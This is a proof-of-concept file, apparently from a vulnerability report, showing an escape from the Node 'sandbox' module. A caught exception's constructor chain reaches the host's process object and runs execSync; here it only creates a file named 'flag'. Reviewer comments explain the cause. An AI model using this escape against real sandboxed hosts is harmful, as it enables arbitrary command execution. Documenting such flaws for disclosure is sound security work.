// Proof of concept: a string of code handed to the `sandbox` module reaches the
// host's `process` object and runs a shell command, i.e. the sandbox does not
// contain it. The payload and statements are kept exactly as reported so the
// reproduction stays valid.
var Sandbox = require("sandbox")
// Payload evaluated inside the sandbox (it is only a string in this file).
//  1. The bare toLocaleString() call is there to make the sandbox raise an
//     exception; the report names this call as the trigger.
//  2. In the catch handler, `pp.constructor` is the caught object's constructor
//     and `.constructor` of that is a Function constructor. Code compiled by it
//     ('return process') can see `process`, so that Function constructor is not
//     confined to the sandboxed global scope.
//     NOTE(review): presumably the exception object is created outside the
//     sandbox context and leaks in through `catch`; confirm against the
//     module's source.
//  3. `process.mainModule.require('child_process').execSync('touch flag')`
//     creates a file named `flag` as harmless evidence of command execution.
// Reviewer takeaway: the root problem is that a host-realm object is reachable
// from sandboxed code at all; filtering individual names or properties would
// not close it. Untrusted code needs an OS-level boundary (separate low-
// privilege process, container, or VM) rather than an in-language sandbox.
var code = `
try{
toLocaleString()
} catch(pp){
pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
`
// NOTE(review): `s` is assigned without var/let/const, so it becomes an
// implicit global (and would throw in strict mode).
s = new Sandbox()
// No callback is passed to run(), so the sandbox's output is not inspected;
// the only observable result is the `flag` file created by the payload.
s.run(code)
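We found a sandbox escape bug. It can be triggered by calling the toLocaleString() function inside the sandbox and catching the exception it throws.
From the caught exception we can reach the host's `process` object and, through it, load `child_process` to execute arbitrary shell commands.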
We found a sandbox escape bug. This bug can be triggered by calling the toLocaleString() function. We can also execute arbitrary shell commands through the host's `process` object.